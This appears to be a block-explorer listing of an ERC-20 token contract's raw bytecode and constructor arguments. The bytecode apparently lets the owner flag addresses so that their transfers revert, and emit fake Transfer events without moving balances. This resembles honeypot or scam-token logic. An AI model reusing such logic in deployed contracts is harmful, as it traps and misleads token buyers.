7f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a2e9190611cd8565b60405180910390fd5b505f8385611a4591906121fa565b9050809150509392505050565b5f808284611a6091906122a1565b905083811015611aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a9c90612947565b60405180910390fd5b8091505092915050565b505050565b5f80611abe611ba1565b90508091505090565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b611b5f60075f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611c43565b611b9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b95906129d5565b60405180910390fd5b50565b5f8073ffffffffffffffffffffffffffffffffffffffff1660015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611c1d5760015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611c3e565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b5f4382119050919050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015611c85578082015181840152602081019050611c6a565b5f8484015250505050565b5f601f19601f8301169050919050565b5f611caa82611c4e565b611cb48185611c58565b9350611cc4818560208601611c68565b611ccd81611c90565b840191505092915050565b5f6020820190508181035f830152611cf08184611ca0565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611d2182611cf8565b9050919050565b611d3181611d17565b82525050565b5f602082019050611d4a5f830184611d28565b92915050565b5f80fd5b5f80fd5b611d6181611d17565b8114611d6b575f80fd5b50565b5f81359050611d7c81611d58565b92915050565b5f819050919050565b611d9481611d82565b8114611d9e575f80fd5b50565b5f81359050611daf81611d8b565b92915050565b5f8060408385031215611dcb57611dca611d50565b5b5f611dd885828601611d6e565b9250506020611de985828601611da1565b9150509250929050565b5f8115159050919050565b611e0781611df3565b82525050565b5f602082019050611e205f830184611dfe565b92915050565b611e2f81611d82565b82525050565b5f602082019050611e485f830184611e26565b92915050565b5f805f60608486031215611e6557611e64611d50565b5b5f611e7286828701611d6e565b9350506020611e8386828701611d6e565b9250506040611e9486828701611da1565b9150509250925092565b5f80fd5b5f80fd5b5f80fd5b5f8083601f840112611ebf57611ebe611e9e565b5b8235905067ffffffffffffffff811115611edc57611edb611ea2565b5b602083019150836020820283011115611ef857611ef7611ea6565b5b9250929050565b5f805f60408486031215611f1657611f15611d50565b5b5f84013567ffffffffffffffff811115611f3357611f32611d54565b5b611f3f86828701611eaa565b93509350506020611f5286828701611da1565b9150509250925092565b5f60ff82169050919050565b611f7181611f5c565b82525050565b5f602082019050611f8a5f830184611f68565b92915050565b611f9981611df3565b8114611fa3575f80fd5b50565b5f81359050611fb481611f90565b92915050565b5f805f60408486031215611fd157611fd0611d50565b5b5f84013567ffffffffffffffff811115611fee57611fed611d54565b5b611ffa86828701611eaa565b9350935050602061200d86828701611fa6565b9150509250925092565b5f61202182611d17565b9050919050565b61203181612017565b811461203b575f80fd5b50565b5f8135905061204c81612028565b92915050565b5f806040838503121561206857612067611d50565b5b5f61207585828601611da1565b92505060206120868582860161203e565b9150509250929050565b5f602082840312156120a5576120a4611d50565b5b5f6120b284828501611d6e565b91505092915050565b5f63ffffffff82169050919050565b6120d3816120bb565b81146120dd575f80fd5b50565b5f813590506120ee816120ca565b92915050565b5f806040838503121561210a57612109611d50565b5b5f61211785828601611d6e565b9250506020612128858286016120e0565b9150509250929050565b5f806040838503121561214857612147611d50565b5b5f61215585828601611d6e565b925050602061216685828601611d6e565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806121b457607f821691505b6020821081036121c7576121c6612170565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61220482611d82565b915061220f83611d82565b9250828203905081811115612227576122266121cd565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f61226482611d82565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612296576122956121cd565b5b600182019050919050565b5f6122ab82611d82565b91506122b683611d82565b92508282019050808211156122ce576122cd6121cd565b5b92915050565b7f436f756c64204e6f742053656e640000000000000000000000000000000000005f82015250565b5f612308600e83611c58565b9150612313826122d4565b602082019050919050565b5f6020820190508181035f830152612335816122fc565b9050919050565b5f60408201905061234f5f830185611d28565b61235c6020830184611e26565b9392505050565b5f8151905061237181611f90565b92915050565b5f6020828403121561238c5761238b611d50565b5b5f61239984828501612363565b91505092915050565b7f436f756c64204e6f7420537061776e00000000000000000000000000000000005f82015250565b5f6123d6600f83611c58565b91506123e1826123a2565b602082019050919050565b5f6020820190508181035f830152612403816123ca565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612464602583611c58565b915061246f8261240a565b604082019050919050565b5f6020820190508181035f83015261249181612458565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6124f2602683611c58565b91506124fd82612498565b604082019050919050565b5f6020820190508181035f83015261251f816124e6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612580602483611c58565b915061258b82612526565b604082019050919050565b5f6020820190508181035f8301526125ad81612574565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61260e602283611c58565b9150612619826125b4565b604082019050919050565b5f6020820190508181035f83015261263b81612602565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f612676601d83611c58565b915061268182612642565b602082019050919050565b5f6020820190508181035f8301526126a38161266a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612704602583611c58565b915061270f826126aa565b604082019050919050565b5f6020820190508181035f830152612731816126f8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612792602383611c58565b915061279d82612738565b604082019050919050565b5f6020820190508181035f8301526127bf81612786565b9050919050565b7f5472616e7366657220616d6f756e74206d7573742062652067726561746572205f8201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b5f612820602983611c58565b915061282b826127c6565b604082019050919050565b5f6020820190508181035f83015261284d81612814565b9050919050565b50565b5f6128625f83611c58565b915061286d82612854565b5f82019050919050565b5f6020820190508181035f83015261288e81612857565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6128c9602083611c58565b91506128d482612895565b602082019050919050565b5f6020820190508181035f8301526128f6816128bd565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612931601b83611c58565b915061293c826128fd565b602082019050919050565b5f6020820190508181035f83015261295e81612925565b9050919050565b7f5472616e736665722044656c617920656e61626c65642e20204f6e6c79206f6e5f8201527f652070757263686173652070657220626c6f636b20616c6c6f7765642e000000602082015250565b5f6129bf603d83611c58565b91506129ca82612965565b604082019050919050565b5f6020820190508181035f8301526129ec816129b3565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365a2646970667358221220195f1c48f5feb5b58ee5d73ab4d74cc7dae6e7d88873c25b547f9f92ff3414c164736f6c63430008140033000000000000000000000000c8194d6b1fd6ac33b04416dbe01248f6f0998c5a00000000000000000000000049421d7f2c5c5274db9b487f929e97006c2da5ab

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610204575f3560e01c806370a0823111610118578063a457c2d7116100ab578063cab5818d1161007a578063cab5818d146105e2578063d5abeb0114610612578063dd62ed3e14610630578063ebad8f1614610660578063f2fde38b1461066a57610204565b8063a457c2d714610548578063a9059cbb14610578578063b7f4e899146105a8578063c2b7bbb6146105c657610204565b80638d981e36116100e75780638d981e36146104d05780638da5cb5b146104ee57806395d89b411461050c5780639c9b4cdb1461052a57610204565b806370a0823114610436578063715018a61461046657806373db1eb2146104705780637c70f3bf146104a057610204565b806326ededb81161019b578063395093511161016a578063395093511461039057806342a5880c146103c0578063486d910f146103de57806349bd5a5e146103fa5780634ed9428e1461041857610204565b806326ededb81461031c5780632d3e69ea14610338578063313ce56714610356578063338d46691461037457610204565b806318160ddd116101d757806318160ddd1461029257806319e99550146102b057806321f83c43146102ce57806323b872dd146102ec57610204565b806306fdde03146102085780630754617214610226578063095ea7b31461024457806312fa6feb14610274575b5f80fd5b610210610686565b60405161021d9190611cd8565b60405180910390f35b61022e610716565b60405161023b9190611d37565b60405180910390f35b61025e60048036038101906102599190611db5565b61073b565b60405161026b9190611e0d565b60405180910390f35b61027c61075d565b6040516102899190611e0d565b60405180910390f35b61029a61076f565b6040516102a79190611e35565b60405180910390f35b6102b8610778565b6040516102c59190611e35565b60405180910390f35b6102d66107aa565b6040516102e39190611e35565b60405180910390f35b61030660048036038101906103019190611e4e565b6107b0565b6040516103139190611e0d565b60405180910390f35b61033660048036038101906103319190611eff565b6107de565b005b6103406108b9565b60405161034d9190611e0d565b60405180910390f35b61035e6108ce565b60405161036b9190611f77565b60405180910390f35b61038e60048036038101906103899190611fba565b6108d6565b005b6103aa60048036038101906103a59190611db5565b61097f565b6040516103b79190611e0d565b60405180910390f35b6103c86109b5565b6040516103d59190611e35565b60405180910390f35b6103f860048036038101906103f39190612052565b6109d9565b005b610402610b02565b60405161040f9190611d37565b60405180910390f35b610420610b27565b60405161042d9190611e35565b60405180910390f35b610450600480360381019061044b9190612090565b610b4b565b60405161045d9190611e35565b60405180910390f35b61046e610b91565b005b61048a60048036038101906104859190612090565b610ba4565b6040516104979190611e0d565b60405180910390f35b6104ba60048036038101906104b591906120f4565b610bf6565b6040516104c79190611e0d565b60405180910390f35b6104d8610c20565b6040516104e59190611d37565b60405180910390f35b6104f6610c45565b6040516105039190611d37565b60405180910390f35b610514610c6d565b6040516105219190611cd8565b60405180910390f35b610532610cfd565b60405161053f9190611d37565b60405180910390f35b610562600480360381019061055d9190611db5565b610d21565b60405161056f9190611e0d565b60405180910390f35b610592600480360381019061058d9190611db5565b610d96565b60405161059f9190611e0d565b60405180910390f35b6105b0610db8565b6040516105bd9190611e35565b60405180910390f35b6105e060048036038101906105db9190612090565b610ddc565b005b6105fc60048036038101906105f79190612090565b610e27565b6040516106099190611e0d565b60405180910390f35b61061a610e44565b6040516106279190611e35565b60405180910390f35b61064a60048036038101906106459190612132565b610e68565b6040516106579190611e35565b60405180910390f35b610668610eea565b005b610684600480360381019061067f9190612090565b610f47565b005b6060600980546106959061219d565b80601f01602080910402602001604051908101604052809291908181526020018280546106c19061219d565b801561070c5780601f106106e35761010080835404028352916020019161070c565b820191905f5260205f20905b8154815290600101906020018083116106ef57829003601f168201915b5050505050905090565b600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f80610745610fc9565b9050610752818585610fd0565b600191505092915050565b600f5f9054906101000a900460ff1681565b5f600854905090565b5f7f00000000000000000000000000000000000000000000000000000000012740c1436107a591906121fa565b905090565b61070881565b5f806107ba610fc9565b90506107c7858285611193565b6107d285858561121e565b60019150509392505050565b6107e661187e565b5f5b838390508110156108b3578383828181106108065761080561222d565b5b905060200201602081019061081b9190612090565b73ffffffffffffffffffffffffffffffffffffffff16600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108989190611e35565b60405180910390a380806108ab9061225a565b9150506107e8565b50505050565b5f60045f9054906101000a900460ff16905090565b5f6009905090565b6108de61187e565b5f5b83839050811015610979578160025f8686858181106109025761090161222d565b5b90506020020160208101906109179190612090565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806109719061225a565b9150506108e0565b50505050565b5f80610989610fc9565b90506109aa81858561099b8589610e68565b6109a591906122a1565b610fd0565b600191505092915050565b7f0000000000000000000000000000000000000000000000000000000065e383b381565b610a0533600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846107b0565b610a44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a3b9061231e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1663a1e463d833846040518363ffffffff1660e01b8152600401610a7f92919061233c565b6020604051808303815f875af1158015610a9b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610abf9190612377565b610afe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af5906123ec565b60405180910390fd5b5050565b600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f0000000000000000000000000000000000000000000000000de0b6b3a764000081565b5f60055f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b9961187e565b610ba25f6118fc565b565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b600e602052815f5260405f20602052805f5260405f205f915091509054906101000a900460ff1681565b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600a8054610c7c9061219d565b80601f0160208091040260200160405190810160405280929190818152602001828054610ca89061219d565b8015610cf35780601f10610cca57610100808354040283529160200191610cf3565b820191905f5260205f20905b815481529060010190602001808311610cd657829003601f168201915b5050505050905090565b7f000000000000000000000000c8194d6b1fd6ac33b04416dbe01248f6f0998c5a81565b5f80610d2b610fc9565b90505f610d388286610e68565b905083811015610d7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d749061247a565b60405180910390fd5b610d8a8286868403610fd0565b60019250505092915050565b5f80610da0610fc9565b9050610dad81858561121e565b600191505092915050565b7f00000000000000000000000000000000000000000000000000000000012740c181565b610de461187e565b80600d5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6002602052805f5260405f205f915054906101000a900460ff1681565b7f0000000000000000000000000000000000000000000000000de0b6b3a764000081565b5f60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ef261187e565b6001151560045f9054906101000a900460ff16151503610f2a575f60045f6101000a81548160ff021916908315150217905550610f45565b600160045f6101000a81548160ff0219169083151502179055505b565b610f4f61187e565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610fbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb490612508565b60405180910390fd5b610fc6816118fc565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361103e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103590612596565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a390612624565b60405180910390fd5b8060065f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111869190611e35565b60405180910390a3505050565b5f61119e8484610e68565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114611218578181101561120a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112019061268c565b60405180910390fd5b6112178484848403610fd0565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361128c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112839061271a565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036112fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f1906127a8565b60405180910390fd5b5f811161133c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161133390612836565b60405180910390fd5b4360075f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061138883826119bf565b506001151560045f9054906101000a900460ff16151514806113dc57506113ad610c45565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b8061141957506113ea610c45565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b156118235760035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156114bb575060035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611671576114cb8383836119eb565b611535816040518060600160405280602681526020016129f46026913960055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546119f09092919063ffffffff16565b60055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506115c68160055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611a5290919063ffffffff16565b60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516116649190611e35565b60405180910390a361181e565b61167c838383611aaf565b6116e6816040518060600160405280602681526020016129f46026913960055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546119f09092919063ffffffff16565b60055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506117778160055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611a5290919063ffffffff16565b60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516118159190611e35565b60405180910390a35b611879565b6001151560045f9054906101000a900460ff16151514611878576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161186f90612877565b60405180910390fd5b5b505050565b611886610fc9565b73ffffffffffffffffffffffffffffffffffffffff166118a4611ab4565b73ffffffffffffffffffffffffffffffffffffffff16146118fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118f1906128df565b60405180910390fd5b565b5f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f808211156119e1576119d183611ac7565b156119e0576119df83611b19565b5b5b6001905092915050565b505050565b5f838311158290611a37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a2e9190611cd8565b60405180910390fd5b505f8385611a4591906121fa565b9050809150509392505050565b5f808284611a6091906122a1565b905083811015611aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a9c90612947565b60405180910390fd5b8091505092915050565b505050565b5f80611abe611ba1565b90508091505090565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b611b5f60075f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611c43565b611b9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b95906129d5565b60405180910390fd5b50565b5f8073ffffffffffffffffffffffffffffffffffffffff1660015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611c1d5760015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611c3e565b5f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b5f4382119050919050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015611c85578082015181840152602081019050611c6a565b5f8484015250505050565b5f601f19601f8301169050919050565b5f611caa82611c4e565b611cb48185611c58565b9350611cc4818560208601611c68565b611ccd81611c90565b840191505092915050565b5f6020820190508181035f830152611cf08184611ca0565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611d2182611cf8565b9050919050565b611d3181611d17565b82525050565b5f602082019050611d4a5f830184611d28565b92915050565b5f80fd5b5f80fd5b611d6181611d17565b8114611d6b575f80fd5b50565b5f81359050611d7c81611d58565b92915050565b5f819050919050565b611d9481611d82565b8114611d9e575f80fd5b50565b5f81359050611daf81611d8b565b92915050565b5f8060408385031215611dcb57611dca611d50565b5b5f611dd885828601611d6e565b9250506020611de985828601611da1565b9150509250929050565b5f8115159050919050565b611e0781611df3565b82525050565b5f602082019050611e205f830184611dfe565b92915050565b611e2f81611d82565b82525050565b5f602082019050611e485f830184611e26565b92915050565b5f805f60608486031215611e6557611e64611d50565b5b5f611e7286828701611d6e565b9350506020611e8386828701611d6e565b9250506040611e9486828701611da1565b9150509250925092565b5f80fd5b5f80fd5b5f80fd5b5f8083601f840112611ebf57611ebe611e9e565b5b8235905067ffffffffffffffff811115611edc57611edb611ea2565b5b602083019150836020820283011115611ef857611ef7611ea6565b5b9250929050565b5f805f60408486031215611f1657611f15611d50565b5b5f84013567ffffffffffffffff811115611f3357611f32611d54565b5b611f3f86828701611eaa565b93509350506020611f5286828701611da1565b9150509250925092565b5f60ff82169050919050565b611f7181611f5c565b82525050565b5f602082019050611f8a5f830184611f68565b92915050565b611f9981611df3565b8114611fa3575f80fd5b50565b5f81359050611fb481611f90565b92915050565b5f805f60408486031215611fd157611fd0611d50565b5b5f84013567ffffffffffffffff811115611fee57611fed611d54565b5b611ffa86828701611eaa565b9350935050602061200d86828701611fa6565b9150509250925092565b5f61202182611d17565b9050919050565b61203181612017565b811461203b575f80fd5b50565b5f8135905061204c81612028565b92915050565b5f806040838503121561206857612067611d50565b5b5f61207585828601611da1565b92505060206120868582860161203e565b9150509250929050565b5f602082840312156120a5576120a4611d50565b5b5f6120b284828501611d6e565b91505092915050565b5f63ffffffff82169050919050565b6120d3816120bb565b81146120dd575f80fd5b50565b5f813590506120ee816120ca565b92915050565b5f806040838503121561210a57612109611d50565b5b5f61211785828601611d6e565b9250506020612128858286016120e0565b9150509250929050565b5f806040838503121561214857612147611d50565b5b5f61215585828601611d6e565b925050602061216685828601611d6e565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806121b457607f821691505b6020821081036121c7576121c6612170565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61220482611d82565b915061220f83611d82565b9250828203905081811115612227576122266121cd565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f61226482611d82565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612296576122956121cd565b5b600182019050919050565b5f6122ab82611d82565b91506122b683611d82565b92508282019050808211156122ce576122cd6121cd565b5b92915050565b7f436f756c64204e6f742053656e640000000000000000000000000000000000005f82015250565b5f612308600e83611c58565b9150612313826122d4565b602082019050919050565b5f6020820190508181035f830152612335816122fc565b9050919050565b5f60408201905061234f5f830185611d28565b61235c6020830184611e26565b9392505050565b5f8151905061237181611f90565b92915050565b5f6020828403121561238c5761238b611d50565b5b5f61239984828501612363565b91505092915050565b7f436f756c64204e6f7420537061776e00000000000000000000000000000000005f82015250565b5f6123d6600f83611c58565b91506123e1826123a2565b602082019050919050565b5f6020820190508181035f830152612403816123ca565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612464602583611c58565b915061246f8261240a565b604082019050919050565b5f6020820190508181035f83015261249181612458565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6124f2602683611c58565b91506124fd82612498565b604082019050919050565b5f6020820190508181035f83015261251f816124e6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612580602483611c58565b915061258b82612526565b604082019050919050565b5f6020820190508181035f8301526125ad81612574565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61260e602283611c58565b9150612619826125b4565b604082019050919050565b5f6020820190508181035f83015261263b81612602565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f612676601d83611c58565b915061268182612642565b602082019050919050565b5f6020820190508181035f8301526126a38161266a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612704602583611c58565b915061270f826126aa565b604082019050919050565b5f6020820190508181035f830152612731816126f8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612792602383611c58565b915061279d82612738565b604082019050919050565b5f6020820190508181035f8301526127bf81612786565b9050919050565b7f5472616e7366657220616d6f756e74206d7573742062652067726561746572205f8201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b5f612820602983611c58565b915061282b826127c6565b604082019050919050565b5f6020820190508181035f83015261284d81612814565b9050919050565b50565b5f6128625f83611c58565b915061286d82612854565b5f82019050919050565b5f6020820190508181035f83015261288e81612857565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6128c9602083611c58565b91506128d482612895565b602082019050919050565b5f6020820190508181035f8301526128f6816128bd565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612931601b83611c58565b915061293c826128fd565b602082019050919050565b5f6020820190508181035f83015261295e81612925565b9050919050565b7f5472616e736665722044656c617920656e61626c65642e20204f6e6c79206f6e5f8201527f652070757263686173652070657220626c6f636b20616c6c6f7765642e000000602082015250565b5f6129bf603d83611c58565b91506129ca82612965565b604082019050919050565b5f6020820190508181035f8301526129ec816129b3565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365a2646970667358221220195f1c48f5feb5b58ee5d73ab4d74cc7dae6e7d88873c25b547f9f92ff3414c164736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000c8194d6b1fd6ac33b04416dbe01248f6f0998c5a00000000000000000000000049421d7f2c5c5274db9b487f929e97006c2da5ab

-----Decoded View---------------
Arg [0] : initialLPAddress (address): 0xc8194d6b1fD6aC33b04416dbe01248f6F0998C5a
Arg [1] : distributor_ (address): 0x49421D7f2C5C5274dB9B487F929E97006c2da5aB

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 000000000000000000000000c8194d6b1fd6ac33b04416dbe01248f6f0998c5a
Arg [1] : 00000000000000000000000049421d7f2c5c5274db9b487f929e97006c2da5ab


Deployed Bytecode Sourcemap

